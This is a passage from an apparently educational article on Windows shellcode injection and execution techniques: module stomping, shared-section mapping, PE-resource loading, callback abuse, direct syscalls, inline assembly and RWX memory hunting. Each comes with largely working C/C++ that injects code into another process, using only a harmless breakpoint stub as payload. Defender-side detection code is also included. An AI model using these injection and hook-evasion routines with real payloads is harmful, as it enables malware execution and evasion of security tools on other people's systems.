VirtualProtectEx(hProcess, targetAddressToStomp, sizeof(shellcode), oldProtect, &oldProtect); // Revert protection
CloseHandle(hProcess);
return 1;
}
std::cout << "Module stomping: Wrote shellcode to " << targetAddressToStomp << "." << std::endl;
// To execute, you could create a remote thread pointing to targetAddressToStomp
std::cout << "Creating remote thread to execute stomped code..." << std::endl;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)targetAddressToStomp, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << "Failed to create remote thread for stomped code. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Remote thread created. Stomped shellcode should execute." << std::endl;
// WaitForSingleObject(hThread, INFINITE); // Optional: wait for shellcode
CloseHandle(hThread);
}
// Revert memory protection (important for stability if the original code is still needed)
// This might make the shellcode non-executable again.
// If shellcode is one-shot, this is good. If it needs to persist, RWX must remain.
// std::cout << "Reverting memory protection..." << std::endl;
// if (!VirtualProtectEx(hProcess, targetAddressToStomp, sizeof(shellcode), oldProtect, &oldProtect)) {
// std::cerr << "Failed to revert memory protection. Error: " << GetLastError() << std::endl;
// }
CloseHandle(hProcess);
return 0;
}
6. NtCreateSection + NtMapViewOfSection: Shared Memory Stealth
This native API-based technique leverages memory sections for stealth. Attackers create a shared memory section and map views of it into both their own process and the target process. Shellcode is written to the local mapped view, and thanks to the shared nature of the section, it automatically appears in the target process’s mapped view. A remote thread is then created in the target process to execute the shellcode. This method avoids the often-monitored WriteProcessMemory API.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <winternl.h> // For NTSTATUS, OBJECT_ATTRIBUTES, UNICODE_STRING etc.
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID function (e.g., getTargetPID from previous examples)
// Signatures for NtCreateSection and NtMapViewOfSection
typedef NTSTATUS(NTAPI* PFNtCreateSection)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PLARGE_INTEGER MaximumSize OPTIONAL,
IN ULONG SectionPageProtection,
IN ULONG AllocationAttributes,
IN HANDLE FileHandle OPTIONAL
);
typedef NTSTATUS(NTAPI* PFNtMapViewOfSection)(
HANDLE SectionHandle,
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset OPTIONAL,
PSIZE_T ViewSize,
SECTION_INHERIT InheritDisposition, // ViewShare or ViewUnmap
ULONG AllocationType,
ULONG Win32Protect
);
// Not strictly needed for anonymous sections, but good practice for named ones.
// For this example, ObjectAttributes will be NULL for an anonymous section.
// VOID InitializeObjectAttributes(
// POBJECT_ATTRIBUTES p,
// PUNICODE_STRING n,
// ULONG a,
// HANDLE r,
// PSECURITY_DESCRIPTOR s
// ) {
// p->Length = sizeof(OBJECT_ATTRIBUTES);
// p->RootDirectory = r;
// p->Attributes = a;
// p->ObjectName = n;
// p->SecurityDescriptor = s;
// p->SecurityQualityOfService = NULL;
// }
int main_section_injection() {
DWORD targetPID = getTargetPID(L"notepad.exe");
if (targetPID == 0) {
std::cerr << "Target PID not obtained for section injection." << std::endl;
return 1;
}
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (hNtdll == NULL) {
std::cerr << "Failed to get handle to ntdll.dll. Error: " << GetLastError() << std::endl;
return 1;
}
PFNtCreateSection pNtCreateSection = (PFNtCreateSection)GetProcAddress(hNtdll, "NtCreateSection");
PFNtMapViewOfSection pNtMapViewOfSection = (PFNtMapViewOfSection)GetProcAddress(hNtdll, "NtMapViewOfSection");
if (!pNtCreateSection || !pNtMapViewOfSection) {
std::cerr << "Failed to get Native API function pointers for section mapping." << std::endl;
return 1;
}
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE, FALSE, targetPID);
// PROCESS_DUP_HANDLE might be needed if section handle is to be duplicated, but mapping often works without it.
// PROCESS_VM_OPERATION for NtMapViewOfSection in remote process.
if (hProcess == NULL) {
std::cerr << "Failed to open target process for section injection. Error: " << GetLastError() << std::endl;
return 1;
}
HANDLE hSection = NULL;
LARGE_INTEGER sectionSize;
sectionSize.QuadPart = sizeof(shellcode); // Size of our shellcode
// For an anonymous section, ObjectAttributes can be NULL.
// OBJECT_ATTRIBUTES oa;
// InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
NTSTATUS status = pNtCreateSection(
&hSection,
SECTION_ALL_ACCESS, // Request full access for mapping RWX
NULL, // POBJECT_ATTRIBUTES (NULL for anonymous)
&sectionSize, // MaximumSize of the section
PAGE_EXECUTE_READWRITE, // Protection for the section itself
SEC_COMMIT, // Allocation attributes (commit memory)
NULL // FileHandle (NULL for pagefile-backed section)
);
if (!NT_SUCCESS(status) || hSection == NULL) {
std::cerr << "NtCreateSection failed. Status: " << std::hex << status << std::endl;
CloseHandle(hProcess);
return 1;
}
std::cout << "Section created successfully. Handle: " << hSection << std::endl;
PVOID pLocalView = NULL;
SIZE_T localViewSize = 0; // Let the system decide based on section size
status = pNtMapViewOfSection(
hSection,
GetCurrentProcess(), // Map to current process
&pLocalView,
0, // ZeroBits
0, // CommitSize (initially committed bytes; the mapped size is governed by ViewSize below)
NULL, // SectionOffset
&localViewSize, // ViewSize (updated by the call)
ViewUnmap, // InheritDisposition (doesn't share across CreateProcess)
0, // AllocationType (MEM_TOP_DOWN, MEM_LARGE_PAGES etc. 0 for default)
PAGE_READWRITE // Protection for this local view (will write shellcode here)
);
if (!NT_SUCCESS(status) || pLocalView == NULL) {
std::cerr << "NtMapViewOfSection (local) failed. Status: " << std::hex << status << std::endl;
CloseHandle(hSection); CloseHandle(hProcess);
return 1;
}
std::cout << "Local section view mapped at: " << pLocalView << " with size: " << localViewSize << std::endl;
memcpy(pLocalView, shellcode, sizeof(shellcode));
std::cout << "Shellcode written to local section view." << std::endl;
PVOID pRemoteView = NULL;
SIZE_T remoteViewSize = 0;
status = pNtMapViewOfSection(
hSection,
hProcess, // Map to target process
&pRemoteView,
0,
0,
NULL,
&remoteViewSize,
ViewUnmap, // InheritDisposition for remote view
0, // AllocationType
PAGE_EXECUTE_READ // Protection for remote view (needs EXECUTE, READ is usually also fine)
// If shellcode self-modifies, PAGE_EXECUTE_READWRITE
);
if (!NT_SUCCESS(status) || pRemoteView == NULL) {
std::cerr << "NtMapViewOfSection (remote) failed. Status: " << std::hex << status << std::endl;
NtUnmapViewOfSection(GetCurrentProcess(), pLocalView); // Unmap local view
CloseHandle(hSection); CloseHandle(hProcess);
return 1;
}
std::cout << "Remote section view mapped in target process at: " << pRemoteView << " with size: " << remoteViewSize << std::endl;
// Now create a remote thread in the target process to execute from pRemoteView
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteView, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << "Failed to create remote thread in target process for section. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Remote thread created to execute shellcode from shared section." << std::endl;
// WaitForSingleObject(hThread, INFINITE); // Optional
CloseHandle(hThread);
}
// Cleanup
NtUnmapViewOfSection(GetCurrentProcess(), pLocalView);
// Remote view cleanup is trickier if code is running from it. Often left or handled by shellcode.
// NtUnmapViewOfSection(hProcess, pRemoteView); // This would typically be done if shellcode is finished.
CloseHandle(hSection); // Section object itself
CloseHandle(hProcess);
return 0;
}
7. Execution from PE Resources: Hiding in Plain Sight
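Shellcode can be embedded as a resource within the malware’s own executable, where it sits in the .rsrc section alongside icons and version data. At runtime, the malware locates the resource with FindResource, LoadResource, and LockResource, allocates executable memory, copies the shellcode into it, and then runs it either directly or on a new thread. This is a local execution technique rather than an injection into another process; its value to the attacker is that the payload looks like ordinary resource data on disk.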
Conceptual C/C++ Code Example:
To use this, you’d typically have a resource file (.rc) linked with your project:
// In a .rc file (e.g., resource.rc)
// #define IDR_SHELLCODE_RESOURCE 101 // Define an ID
// IDR_SHELLCODE_RESOURCE RCDATA "path\\to\\your\\shellcode.bin"
//
// shellcode.bin would be a binary file containing your raw shellcode bytes.
#include <windows.h>
#include <iostream>
// Shellcode defined globally or included (used if resource loading fails or for direct demo)
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Define a resource ID (must match the one in your .rc file if using actual resources)
#define IDR_SHELLCODE_RESOURCE 101
void executeShellcodeLocally(const unsigned char* sc_data, size_t sc_len) {
LPVOID pExecMem = VirtualAlloc(NULL, sc_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pExecMem == NULL) {
std::cerr << "Failed to allocate executable memory. Error: " << GetLastError() << std::endl;
return;
}
std::cout << "Executable memory allocated at: " << pExecMem << std::endl;
memcpy(pExecMem, sc_data, sc_len);
std::cout << "Shellcode copied to executable memory." << std::endl;
std::cout << "Executing shellcode directly via function pointer..." << std::endl;
void (*ShellcodeFunc)() = (void(*)())pExecMem;
// __try/__except can be used for basic error handling around direct execution
__try {
ShellcodeFunc(); // Execute the shellcode
}
__except(EXCEPTION_EXECUTE_HANDLER) {
std::cerr << "Exception occurred during shellcode execution." << std::endl;
}
// Alternatively, create a new thread for more isolated execution:
// HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pExecMem, NULL, 0, NULL);
// if (hThread) {
// std::cout << "Shellcode executing in new thread." << std::endl;
// WaitForSingleObject(hThread, INFINITE);
// CloseHandle(hThread);
// } else {
// std::cerr << "Failed to create thread for shellcode. Error: " << GetLastError() << std::endl;
// }
std::cout << "Shellcode execution finished (or INT3 breakpoint hit / exception)." << std::endl;
VirtualFree(pExecMem, 0, MEM_RELEASE);
}
int main_pe_resource_execution() {
std::cout << "Attempting to load shellcode from PE resource..." << std::endl;
HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_SHELLCODE_RESOURCE), RT_RCDATA);
// For FindResource to work, the calling module (the .exe) must have the resource.
// If NULL is passed as HMODULE, it searches the .exe.
// GetModuleHandle(NULL) can also be used for the current executable.
if (hRes == NULL) {
std::cerr << "FindResource failed. Error: " << GetLastError() << std::endl;
std::cerr << "Ensure resource IDR_SHELLCODE_RESOURCE (101) with type RCDATA exists." << std::endl;
std::cout << "Falling back to global shellcode array for demonstration." << std::endl;
executeShellcodeLocally(shellcode, sizeof(shellcode)); // Fallback
return 1;
}
HGLOBAL hResLoad = LoadResource(NULL, hRes);
if (hResLoad == NULL) {
std::cerr << "LoadResource failed. Error: " << GetLastError() << std::endl;
return 1;
}
LPVOID pShellcodeRes = LockResource(hResLoad);
if (pShellcodeRes == NULL) {
std::cerr << "LockResource failed. Error: " << GetLastError() << std::endl;
// FreeResource not needed for LockResource on modern Windows if LoadResource succeeded
return 1;
}
DWORD dwSize = SizeofResource(NULL, hRes);
if (dwSize == 0) {
std::cerr << "SizeofResource is zero. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Shellcode resource loaded successfully. Size: " << dwSize << " bytes." << std::endl;
executeShellcodeLocally((const unsigned char*)pShellcodeRes, dwSize);
// FreeResource(hResLoad); // Not strictly necessary for RCDATA after LockResource on modern Windows,
// as the resource remains loaded with the module.
// However, some old documentation might suggest it.
return 0;
}
8. Shellcode Execution via Callback Functions: A Hooked Call
Many Windows API functions accept a callback function pointer. Attackers can abuse this by allocating memory for their shellcode, copying it there, and then calling a legitimate Windows API function, passing the shellcode’s address as the callback argument. When the API attempts to call its callback, it inadvertently executes the shellcode. The shellcode must be crafted to match the callback’s signature and calling convention.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
// Shellcode placeholder. For a real callback, it MUST match the expected function signature
// and the calling convention of the target architecture (e.g., __stdcall for many 32-bit WinAPI callbacks).
// The generic NOPs, INT3, RET (0xC3) stub does not clean up stdcall arguments and leaves the
// return value undefined, so it is not a well-formed callback.
// A proper 32-bit shellcode for a callback like EnumWindowsProc would:
// ; receive HWND hwnd, LPARAM lParam on the stack
// ; ... do its work ...
// ; clean up the stack (ret 8 for two 4-byte stdcall arguments)
// ; return TRUE/FALSE in EAX
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 }; // Simple version
// Shellcode crafted for EnumWindowsProc (BOOL CALLBACK(HWND, LPARAM)), 32-bit x86 builds only.
// On x64 the arguments arrive in RCX and RDX and the callee does not pop them, so "ret 8" would corrupt the stack.
// This stub hits INT3 and then returns TRUE (mov eax, 1; ret 8)
unsigned char callback_shellcode[] = {
0xCC, // INT3 (Breakpoint to observe)
0xB8, 0x01, 0x00, 0x00, 0x00, // mov eax, 1 (Return TRUE)
0xC2, 0x08, 0x00 // ret 8 (Clean up 2*4=8 bytes of arguments from stack for stdcall)
};
int main_callback_execution() {
LPVOID pExecMem = VirtualAlloc(NULL, sizeof(callback_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pExecMem == NULL) {
std::cerr << "VirtualAlloc for callback failed. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Shellcode memory allocated at: " << pExecMem << std::endl;
memcpy(pExecMem, callback_shellcode, sizeof(callback_shellcode));
std::cout << "Shellcode copied to executable memory." << std::endl;
std::cout << "Attempting to execute shellcode via EnumWindows callback..." << std::endl;
// The shellcode at pExecMem will be called for each top-level window.
// It must be written to handle the arguments (HWND, LPARAM) and calling convention (stdcall for EnumWindowsProc).
EnumWindows((WNDENUMPROC)pExecMem, NULL); // Pass shellcode address as callback
// Other examples of APIs with callbacks:
// SetTimer(NULL, 0, 1000, (TIMERPROC)pExecMem); // TIMERPROC is VOID CALLBACK(HWND, UINT, UINT_PTR, DWORD)
// LineDDA(0,0,0,0, (LINEDDAPROC)pExecMem, NULL); // LINEDDAPROC is VOID CALLBACK(int, int, LPARAM)
// GrayString(NULL, NULL, (GRAYSTRINGPROC)pExecMem, 0, 0,0,0,0); // GRAYSTRINGPROC is BOOL CALLBACK(HDC, LPARAM, int)
std::cout << "API call with callback completed. If shellcode executed, INT3 breakpoint might have occurred." << std::endl;
VirtualFree(pExecMem, 0, MEM_RELEASE);
return 0;
}
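The mechanism being abused is ordinary callback dispatch: the API does not inspect what lives at the pointer it is given, it simply calls it with the agreed arguments and acts on the return value. The portable sketch below illustrates only that dispatch step with a benign function. `enumerate_items`, `ItemCallback`, and `stop_at_three` are hypothetical names standing in for an EnumWindows-style API and its callback; nothing here is Windows code.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical callback type shaped like EnumWindowsProc:
// receives one item plus a user parameter, returns false to stop enumeration.
using ItemCallback = bool (*)(std::uintptr_t item, std::intptr_t user_param);

// Hypothetical enumerator standing in for an API such as EnumWindows.
// It calls whatever address it was handed, once per item, and stops early
// when the callback returns false. Returns the number of calls made.
int enumerate_items(const std::vector<std::uintptr_t>& items,
                    ItemCallback cb,
                    std::intptr_t user_param) {
    int calls = 0;
    for (std::uintptr_t item : items) {
        ++calls;
        if (!cb(item, user_param)) {
            break;
        }
    }
    return calls;
}

// Benign callback: counts invocations through the user parameter
// and asks the enumerator to stop once it sees item 3.
bool stop_at_three(std::uintptr_t item, std::intptr_t user_param) {
    int* seen = reinterpret_cast<int*>(user_param);
    ++*seen;
    return item != 3;
}
```

Because the enumerator trusts both the argument layout and the return value, a callback that ignores the expected signature can derail the caller, which is why the shellcode above has to honor the callback’s contract.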
9. Calling Syscalls Directly or Indirectly: Bypassing User-Mode Hooks
To evade security software that places hooks on user-mode API functions, malware can invoke the underlying system calls itself, performing the transition from user mode to kernel mode without passing through the hooked code. Shellcode crafted this way bypasses user-mode hooks, although kernel-level telemetry still observes the resulting operations. Tools like SysWhispers, Hell’s Gate, or Halo’s Gate aid in this process by finding syscall numbers and providing assembly stubs.
Conceptual C/C++ Code Example:
This is highly conceptual as it requires assembly. The C++ code would typically prepare arguments and then call an assembly stub.
#include <windows.h>
#include <iostream>
#include <winternl.h> // For NTSTATUS
// This is a placeholder for shellcode that would itself contain direct syscalls.
// Or, it's a C program that uses assembly stubs for syscalls.
// unsigned char syscall_shellcode[] = { /* ... assembly ... */ 0xCC, 0xC3 };
// Example: Using a hypothetical assembly function for NtAllocateVirtualMemory via syscall
// This function would be defined in an .asm file or via advanced inline assembly.
/*
EXTERN_C NTSTATUS MyNtAllocateVirtualMemory_Syscall(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
// ASM implementation (conceptual for x64):
// MyNtAllocateVirtualMemory_Syscall PROC
// mov r10, rcx ; Windows x64 syscall convention
// mov eax, SYSCALL_NUMBER_NtAllocateVirtualMemory ; Actual syscall number
// syscall
// ret
// MyNtAllocateVirtualMemory_Syscall ENDP
*/
// For demonstration, we'll just outline the idea.
// A real implementation would use a tool like SysWhispers to generate the stubs.
// Let's assume we have a way to get the syscall number (this is complex and OS-version dependent)
// For example, from a tool like SysWhispers output or by parsing ntdll.dll.
// WORD GetSyscallNumber(LPCSTR functionName) { /* ... complex logic ... */ return 0x18; // Example for NtAllocateVirtualMemory }
int main_direct_syscalls() {
std::cout << "Direct Syscall technique: This example is conceptual." << std::endl;
std::cout << "It requires assembly language or tools like SysWhispers/Hell's Gate." << std::endl;
// 1. Obtain syscall numbers (e.g., for NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx)
// This is typically done by parsing ntdll.dll at runtime or using known values for specific OS versions.
// WORD syscallAllocate = GetSyscallNumber("NtAllocateVirtualMemory");
// WORD syscallWrite = GetSyscallNumber("NtWriteVirtualMemory");
// WORD syscallCreate = GetSyscallNumber("NtCreateThreadEx");
// 2. Prepare arguments for the syscall.
// 3. Call an assembly stub that sets up registers and executes the 'syscall' instruction.
/*
HANDLE targetProcess = GetCurrentProcess(); // Or a remote process handle obtained via other means
PVOID allocatedMemory = NULL;
SIZE_T size = sizeof(shellcode); // Assuming 'shellcode' is defined elsewhere
NTSTATUS status;
// Conceptual call to an assembly stub for NtAllocateVirtualMemory
// status = AsmNtAllocateVirtualMemory(syscallAllocate, targetProcess, &allocatedMemory, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (NT_SUCCESS(status) && allocatedMemory) {
std::cout << "Memory allocated via conceptual direct syscall at: " << allocatedMemory << std::endl;
// Conceptually write shellcode using another direct syscall (AsmNtWriteVirtualMemory)
// status = AsmNtWriteVirtualMemory(syscallWrite, targetProcess, allocatedMemory, shellcode, sizeof(shellcode), NULL);
if (NT_SUCCESS(status)) {
std::cout << "Shellcode written via conceptual direct syscall." << std::endl;
HANDLE hThread = NULL;
// Conceptually create thread using direct syscall (AsmNtCreateThreadEx)
// status = AsmNtCreateThreadEx(syscallCreate, &hThread, THREAD_ALL_ACCESS, NULL, targetProcess, allocatedMemory, NULL, FALSE, 0, 0, 0, NULL);
if (NT_SUCCESS(status) && hThread) {
std::cout << "Thread created via conceptual direct syscall." << std::endl;
// WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}
}
// Conceptually free memory using direct syscall (AsmNtFreeVirtualMemory)
// AsmNtFreeVirtualMemory(syscallFree, targetProcess, &allocatedMemory, &size_zero_for_release, MEM_RELEASE);
} else {
std::cout << "Conceptual direct syscall for allocation failed. Status: " << std::hex << status << std::endl;
}
*/
std::cout << "For practical implementations, refer to specialized tools that generate syscall stubs." << std::endl;
return 0;
}
10. Using Inline Assembly: Integrated Malice
Shellcode can be embedded directly within a C/C++ program’s source code using inline assembly blocks (__asm for MSVC, asm volatile for GCC/Clang). This allows the shellcode to be executed within the program’s own process, potentially avoiding detectable memory allocation functions if the shellcode is placed in an executable section or if memory is allocated discreetly.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
// Shellcode to be executed via inline assembly.
// This is a simple NOP sled, INT3, RET.
unsigned char inline_asm_shellcode[] = {
0x90, 0x90, 0x90, 0x90, // NOPs
0xCC, // INT3 (breakpoint)
0xC3 // RET
};
void execute_via_inline_assembly() {
std::cout << "Preparing to execute shellcode via inline assembly..." << std::endl;
// For Data Execution Prevention (DEP) compatibility, shellcode usually needs to be in executable memory.
// If inline_asm_shellcode is in a data segment, this VirtualAlloc is crucial.
// If the compiler places it in a .text (code) segment, this might not be needed, but it's safer.
LPVOID pExecMem = VirtualAlloc(NULL, sizeof(inline_asm_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pExecMem == NULL) {
std::cerr << "Failed to allocate executable memory for inline asm. Error: " << GetLastError() << std::endl;
return;
}
memcpy(pExecMem, inline_asm_shellcode, sizeof(inline_asm_shellcode));
std::cout << "Shellcode copied to executable memory at: " << pExecMem << std::endl;
std::cout << "Jumping to shellcode..." << std::endl;
#if defined(_MSC_VER) && defined(_M_IX86) // 32-bit MSVC only; the x64 MSVC compiler rejects __asm blocks
// For 32-bit MSVC, __asm is straightforward.
// For 64-bit MSVC, inline assembly is very limited; usually requires .asm files.
// This example is more suited for 32-bit compilation with MSVC.
void* shellcode_target_ptr = pExecMem;
__try {
__asm {
mov eax, shellcode_target_ptr // Load address of shellcode into EAX
call eax // Call the address in EAX
}
} __except(EXCEPTION_EXECUTE_HANDLER) {
std::cerr << "Exception during MSVC inline asm execution." << std::endl;
}
#elif defined(__GNUC__) || defined(__clang__) // GCC/Clang
// GCC and Clang do not support MSVC's __try/__except, so the call is made directly.
// An unhandled fault here (including the INT3 when no debugger is attached) terminates the process.
void (*ShellcodeFunc)() = (void(*)())pExecMem;
ShellcodeFunc();
// More direct GCC inline assembly:
// __asm__ volatile (
// "call *%0"
// : /* no output operands */
// : "r"(pExecMem) /* input operand: shellcode address in any general-purpose register */
// : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11", "memory" /* clobbered registers and memory */
// );
#else
std::cout << "Inline assembly not specifically demonstrated for this compiler." << std::endl;
std::cout << "Falling back to function pointer call for demonstration." << std::endl;
void (*ShellcodeFuncFallback)() = (void(*)())pExecMem;
__try {
ShellcodeFuncFallback();
} __except(EXCEPTION_EXECUTE_HANDLER) {
std::cerr << "Exception during fallback function pointer execution." << std::endl;
}
#endif
std::cout << "Inline assembly shellcode execution attempt finished." << std::endl;
VirtualFree(pExecMem, 0, MEM_RELEASE);
}
int main_inline_assembly() {
execute_via_inline_assembly();
return 0;
}
11. RWX Memory Hunting: Finding Pre-Existing Loopholes
Instead of allocating new memory, malware can search a process for existing memory regions that are already mapped with Read, Write, and Execute (RWX) permissions. Such regions are rare in well-behaved processes, though they do occur, for example in applications that host a JIT compiler. Finding one allows the malware to write its shellcode directly into the region and then execute it, potentially evading detection mechanisms that watch for memory allocation or permission-change APIs like VirtualAllocEx or VirtualProtectEx.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID function (e.g., getTargetPID from previous examples)
int main_rwx_hunting() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example target
if (targetPID == 0) {
std::cerr << "Target PID not obtained for RWX hunting." << std::endl;
return 1;
}
// Required permissions: PROCESS_QUERY_INFORMATION for VirtualQueryEx,
// PROCESS_VM_WRITE for WriteProcessMemory, PROCESS_CREATE_THREAD for CreateRemoteThread.
// PROCESS_VM_READ is also implicitly useful.
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process for RWX hunting. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Hunting for RWX memory in PID: " << targetPID << std::endl;
unsigned char* pCurrentAddress = NULL; // Start scanning from address 0
MEMORY_BASIC_INFORMATION mbi;
bool found_rwx_region = false;
LPVOID rwx_execution_address = NULL;
// Iterate through the process's memory regions
while (VirtualQueryEx(hProcess, pCurrentAddress, &mbi, sizeof(mbi)) == sizeof(mbi)) {
// Check if the memory region is committed, and has PAGE_EXECUTE_READWRITE protection
if (mbi.State == MEM_COMMIT && mbi.Protect == PAGE_EXECUTE_READWRITE) {
// Check if the region is large enough for our shellcode
if (mbi.RegionSize >= sizeof(shellcode)) {
std::cout << "Found potential RWX region at: " << mbi.BaseAddress
<< " with size: " << mbi.RegionSize << " bytes." << std::endl;
// For PoC, use the first suitable region found.
// A more sophisticated malware might check for "empty" space or other heuristics.
rwx_execution_address = mbi.BaseAddress; // Could also be an offset within this region
found_rwx_region = true;
break;
}
}
// Move to the next memory region
pCurrentAddress += mbi.RegionSize;
if ((DWORD_PTR)pCurrentAddress < (DWORD_PTR)mbi.BaseAddress + mbi.RegionSize) { // Check for overflow/wrap-around
std::cerr << "Memory scanning error or end of address space." << std::endl;
break;
}
}
if (found_rwx_region && rwx_execution_address) {
std::cout << "Attempting to write shellcode to RWX region: " << rwx_execution_address << std::endl;
SIZE_T bytesWritten;
if (!WriteProcessMemory(hProcess, rwx_execution_address, shellcode, sizeof(shellcode), &bytesWritten) || bytesWritten != sizeof(shellcode)) {
std::cerr << "Failed to write shellcode to RWX region. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Shellcode (" << bytesWritten << " bytes) written to RWX region." << std::endl;
// Execute the shellcode in the RWX region
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rwx_execution_address, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << "Failed to create remote thread in RWX region. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Remote thread created in RWX region. Shellcode should execute." << std::endl;
// WaitForSingleObject(hThread, INFINITE); // Optional
CloseHandle(hThread);
}
}
} else {
std::cout << "No suitable RWX memory region found or region not large enough for the shellcode." << std::endl;
}
CloseHandle(hProcess);
return 0;
}
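From the defender’s side, the same region walk can drive a simple triage rule. The sketch below is a portable illustration rather than Windows code: the `Region` struct and the `is_suspicious_rwx` and `find_suspicious` helpers are hypothetical, and the constants are copied from the Windows SDK values so the logic can be exercised without the API. It flags committed, private regions whose base protection is RWX, masking off modifier bits such as PAGE_GUARD that a plain equality test on the protection value would miss.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Values mirror the Windows SDK definitions in winnt.h.
constexpr std::uint32_t kMemCommit            = 0x1000;
constexpr std::uint32_t kMemPrivate           = 0x20000;
constexpr std::uint32_t kMemImage             = 0x1000000;
constexpr std::uint32_t kPageReadWrite        = 0x04;
constexpr std::uint32_t kPageExecuteReadWrite = 0x40;
constexpr std::uint32_t kPageGuard            = 0x100;
constexpr std::uint32_t kPageNoCache          = 0x200;
constexpr std::uint32_t kPageWriteCombine     = 0x400;

// Hypothetical stand-in for the MEMORY_BASIC_INFORMATION fields used here.
struct Region {
    std::uintptr_t base;
    std::size_t    size;
    std::uint32_t  state;
    std::uint32_t  protect;
    std::uint32_t  type;
};

// Heuristic: committed + private + RWX once modifier bits are stripped.
// Image-backed and file-mapped regions are deliberately not flagged.
bool is_suspicious_rwx(const Region& r) {
    const std::uint32_t modifiers = kPageGuard | kPageNoCache | kPageWriteCombine;
    const std::uint32_t base_protect = r.protect & ~modifiers;
    return r.state == kMemCommit &&
           r.type == kMemPrivate &&
           base_protect == kPageExecuteReadWrite;
}

// Collects every region that matches the heuristic, in scan order.
std::vector<Region> find_suspicious(const std::vector<Region>& regions) {
    std::vector<Region> hits;
    for (const Region& r : regions) {
        if (is_suspicious_rwx(r)) {
            hits.push_back(r);
        }
    }
    return hits;
}
```

A rule like this is only a starting point: processes that host a JIT compiler produce legitimate private RWX memory, so hits would normally be correlated with other signals before being treated as an alert.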
The Ever-Evolving Landscape
These techniques are part of an ongoing contest between attackers and defenders. Attackers keep refining their methods, which vary in complexity, stealth, and the specific Windows functionality they abuse. For security professionals, understanding these approaches is essential for building effective detection and mitigation strategies.